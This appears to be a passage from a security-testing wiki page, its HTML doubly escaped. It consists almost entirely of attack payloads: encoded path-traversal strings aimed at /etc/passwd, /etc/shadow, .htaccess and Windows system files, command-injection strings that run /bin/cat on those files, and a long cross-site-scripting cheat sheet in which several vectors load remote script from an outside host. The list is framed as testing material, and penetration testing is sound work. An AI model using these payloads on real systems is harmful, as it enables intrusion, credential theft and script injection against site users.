%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
../../../../../../../../../../../../etc/hosts%00&lt;br /&gt;
../../../../../../../../../../../../etc/hosts&lt;br /&gt;
../../boot.ini&lt;br /&gt;
/../../../../../../../../%2A&lt;br /&gt;
../../../../../../../../../../../../etc/passwd%00&lt;br /&gt;
../../../../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../../../../../etc/shadow%00&lt;br /&gt;
../../../../../../../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../etc/passwd^^&lt;br /&gt;
/../../../../../../../../../../etc/shadow^^&lt;br /&gt;
/../../../../../../../../../../etc/passwd&lt;br /&gt;
/../../../../../../../../../../etc/shadow&lt;br /&gt;
/./././././././././././etc/passwd&lt;br /&gt;
/./././././././././././etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/passwd&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../etc/shadow&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd&lt;br /&gt;
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\passwd%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\etc\shadow%00&lt;br /&gt;
%0a/bin/cat%20/etc/passwd&lt;br /&gt;
%0a/bin/cat%20/etc/shadow&lt;br /&gt;
%00/etc/passwd%00&lt;br /&gt;
%00/etc/shadow%00&lt;br /&gt;
%00../../../../../../etc/passwd&lt;br /&gt;
%00../../../../../../etc/shadow&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.jpg&lt;br /&gt;
/../../../../../../../../../../../etc/passwd%00.html&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd&lt;br /&gt;
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00&lt;br /&gt;
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%&lt;br /&gt;
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/passwd\\&amp;amp;amp;apos;&lt;br /&gt;
\\&amp;amp;amp;apos;/bin/cat%20/etc/shadow\\&amp;amp;amp;apos;&lt;br /&gt;
../../../../../../../../conf/server.xml&lt;br /&gt;
/../../../../../../../../bin/id|&lt;br /&gt;
C:/inetpub/wwwroot/global.asa&lt;br /&gt;
C:\inetpub\wwwroot\global.asa&lt;br /&gt;
C:/boot.ini&lt;br /&gt;
C:\boot.ini&lt;br /&gt;
../../../../../../../../../../../../localstart.asp%00&lt;br /&gt;
../../../../../../../../../../../../localstart.asp&lt;br /&gt;
../../../../../../../../../../../../boot.ini%00&lt;br /&gt;
../../../../../../../../../../../../boot.ini&lt;br /&gt;
/./././././././././././boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00&lt;br /&gt;
/../../../../../../../../../../../boot.ini&lt;br /&gt;
/..\../..\../..\../..\../..\../..\../boot.ini&lt;br /&gt;
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini&lt;br /&gt;
\..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini%00&lt;br /&gt;
..\..\..\..\..\..\..\..\..\..\boot.ini&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.html&lt;br /&gt;
/../../../../../../../../../../../boot.ini%00.jpg&lt;br /&gt;
/.../.../.../.../.../&lt;br /&gt;
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini&lt;br /&gt;
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.'' &lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements  ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements &lt;br /&gt;
&amp;lt;pre&amp;gt;';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;amp;lt;XSS&amp;amp;gt;=&amp;amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities) &lt;br /&gt;
&amp;lt;pre&amp;gt;'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83))&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
=== XSS Statements (Full List) - (Update: 11 August 2009 - Total Statements: 162) &lt;br /&gt;
&amp;lt;pre&amp;gt;Statements&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=javascript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=`javascript:alert(&amp;quot;&amp;quot;RSnake says, 'XSS'&amp;quot;&amp;quot;)`&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#0000106&amp;amp;amp;#0000097&amp;amp;amp;#0000118&amp;amp;amp;#0000097&amp;amp;amp;#0000115&amp;amp;amp;#0000099&amp;amp;amp;#0000114&amp;amp;amp;#0000105&amp;amp;amp;#0000112&amp;amp;amp;#0000116&amp;amp;amp;#0000058&amp;amp;amp;#0000097&amp;amp;amp;#0000108&amp;amp;amp;#0000101&amp;amp;amp;#0000114&amp;amp;amp;#0000116&amp;amp;amp;#0000040&amp;amp;amp;#0000039&amp;amp;amp;#0000088&amp;amp;amp;#0000083&amp;amp;amp;#0000083&amp;amp;amp;#0000039&amp;amp;amp;#0000041&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;IMG SRC=&amp;amp;amp;#x6A&amp;amp;amp;#x61&amp;amp;amp;#x76&amp;amp;amp;#x61&amp;amp;amp;#x73&amp;amp;amp;#x63&amp;amp;amp;#x72&amp;amp;amp;#x69&amp;amp;amp;#x70&amp;amp;amp;#x74&amp;amp;amp;#x3A&amp;amp;amp;#x61&amp;amp;amp;#x6C&amp;amp;amp;#x65&amp;amp;amp;#x72&amp;amp;amp;#x74&amp;amp;amp;#x28&amp;amp;amp;#x27&amp;amp;amp;#x58&amp;amp;amp;#x53&amp;amp;amp;#x53&amp;amp;amp;#x27&amp;amp;amp;#x29&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;jav&amp;quot;&lt;br /&gt;
&amp;quot;ascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;IMG SRC=java\0script:alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;perl -e 'print &amp;quot;&amp;quot;&amp;amp;lt;SCR\0IPT&amp;amp;gt;alert(\&amp;quot;&amp;quot;XSS\&amp;quot;&amp;quot;)&amp;amp;lt;/SCR\0IPT&amp;amp;gt;&amp;quot;&amp;quot;;' &amp;amp;gt; out&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot; &amp;amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/XSS SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY onload!#$%&amp;amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;SCRIPT/SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);//&amp;amp;lt;&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;amp;lt;B&amp;amp;gt;&lt;br /&gt;
&amp;amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;quot;&lt;br /&gt;
&amp;amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;amp;lt;&lt;br /&gt;
&amp;amp;lt;SCRIPT&amp;amp;gt;a=/XSS/\nalert(a.source)&amp;amp;lt;/SCRIPT&amp;amp;gt;&lt;br /&gt;
&amp;quot;\&amp;quot;&amp;quot;;alert('XSS');//&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;/TITLE&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;);&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;INPUT TYPE=&amp;quot;&amp;quot;IMAGE&amp;quot;&amp;quot; SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BODY BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;BODY ONLOAD=alert('XSS')&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG DYNSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG LOWSRC=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BGSOUND SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BR SIZE=&amp;quot;&amp;quot;&amp;amp;amp;{alert('XSS')}&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LAYER SRC=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/LAYER&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;LINK REL=&amp;quot;&amp;quot;stylesheet&amp;quot;&amp;quot; HREF=&amp;quot;&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;STYLE&amp;amp;gt;@import'http://ha.ckers.org/xss.css';&amp;amp;lt;/STYLE&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;Link&amp;quot;&amp;quot; Content=&amp;quot;&amp;quot;&amp;amp;lt;http://ha.ckers.org/xss.css&amp;amp;gt;; REL=stylesheet&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;BODY{-moz-binding:url(&amp;quot;&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;li {list-style-image: url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;UL&amp;amp;gt;&amp;amp;lt;LI&amp;amp;gt;XSS&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)'&amp;amp;gt;&amp;quot;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;META HTTP-EQUIV=&amp;quot;&amp;quot;refresh&amp;quot;&amp;quot; CONTENT=&amp;quot;&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IFRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/IFRAME&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;FRAMESET&amp;amp;gt;&amp;amp;lt;FRAME SRC=&amp;quot;&amp;quot;javascript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/FRAMESET&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;TABLE&amp;amp;gt;&amp;amp;lt;TD BACKGROUND=&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;background-image: url(&amp;amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;DIV STYLE=&amp;quot;&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)';&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;IMG STYLE=&amp;quot;&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XSS STYLE=&amp;quot;&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;exp/*&amp;amp;lt;A STYLE='no\xss:noxss(&amp;quot;&amp;quot;*//*&amp;quot;&amp;quot;);xss:ex/*XSS*//*/*/pression(alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;))'&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE TYPE=&amp;quot;&amp;quot;text/javascript&amp;quot;&amp;quot;&amp;amp;gt;alert('XSS');&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE&amp;amp;gt;.XSS{background-image:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;);}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;amp;lt;A CLASS=XSS&amp;amp;gt;&amp;amp;lt;/A&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;STYLE type=&amp;quot;&amp;quot;text/css&amp;quot;&amp;quot;&amp;amp;gt;BODY{background:url(&amp;quot;&amp;quot;javascript:alert('XSS')&amp;quot;&amp;quot;)}&amp;amp;lt;/STYLE&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;!--[if gte IE 4]&amp;amp;gt;&amp;amp;lt;SCRIPT&amp;amp;gt;alert('XSS');&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;amp;lt;![endif]--&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;BASE HREF=&amp;quot;&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;quot;&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;OBJECT TYPE=&amp;quot;&amp;quot;text/x-scriptlet&amp;quot;&amp;quot; DATA=&amp;quot;&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;amp;gt;&amp;amp;lt;param name=url value=javascript:alert('XSS')&amp;amp;gt;&amp;amp;lt;/OBJECT&amp;amp;gt;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;http://ha.ckers.org/xss.swf&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;EMBED SRC=&amp;quot;&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot;&amp;quot; type=&amp;quot;&amp;quot;image/svg+xml&amp;quot;&amp;quot; AllowScriptAccess=&amp;quot;&amp;quot;always&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/EMBED&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML xmlns:xss&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;xss:xss&amp;amp;gt;XSS&amp;amp;lt;/xss:xss&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=I&amp;amp;gt;&amp;amp;lt;X&amp;amp;gt;&amp;amp;lt;C&amp;amp;gt;&amp;amp;lt;![CDATA[&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas]]&amp;amp;gt;&amp;amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;quot;&amp;amp;gt;]]&amp;amp;gt;&amp;amp;lt;/C&amp;amp;gt;&amp;amp;lt;/X&amp;amp;gt;&amp;amp;lt;/xml&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML ID=&amp;quot;&amp;quot;xss&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;I&amp;amp;gt;&amp;amp;lt;B&amp;amp;gt;&amp;amp;lt;IMG SRC=&amp;quot;&amp;quot;javas&amp;amp;lt;!-- --&amp;amp;gt;cript:alert('XSS')&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/B&amp;amp;gt;&amp;amp;lt;/I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=&amp;quot;&amp;quot;#xss&amp;quot;&amp;quot; DATAFLD=&amp;quot;&amp;quot;B&amp;quot;&amp;quot; DATAFORMATAS=&amp;quot;&amp;quot;HTML&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;XML SRC=&amp;quot;&amp;quot;xsstest.xml&amp;quot;&amp;quot; ID=I&amp;amp;gt;&amp;amp;lt;/XML&amp;amp;gt;&amp;amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;amp;gt;&amp;amp;lt;/SPAN&amp;amp;gt;&amp;quot;&lt;br /&gt;
&amp;quot;&amp;amp;lt;HTML&amp;amp;gt;&amp;amp;lt;BODY&amp;amp;gt;&amp;amp;lt;?xml:namespace prefix=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; ns=&amp;quot;&amp;quot;urn:schemas-microsoft-com:time&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;?import namespace=&amp;quot;&amp;quot;t&amp;quot;&amp;quot; implementation=&amp;quot;&amp;quot;#default#time2&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;t:set attributeName=&amp;quot;&amp;quot;innerHTML&amp;quot;&amp;quot; to=&amp;quot;&amp;quot;XSS&amp;amp;lt;SCRIPT DEFER&amp;amp;gt;alert(&amp;quot;&amp;quot;XSS&amp;quot;&amp;quot;)&amp;amp;lt;/SCRIPT&amp;amp;gt;&amp;quot;&amp;quot;&amp;amp;gt;&amp;amp;lt;/BODY&amp;amp;gt;&amp;amp;lt;/HTML&amp;amp;gt;&amp;quot;&lt;br /&gt;
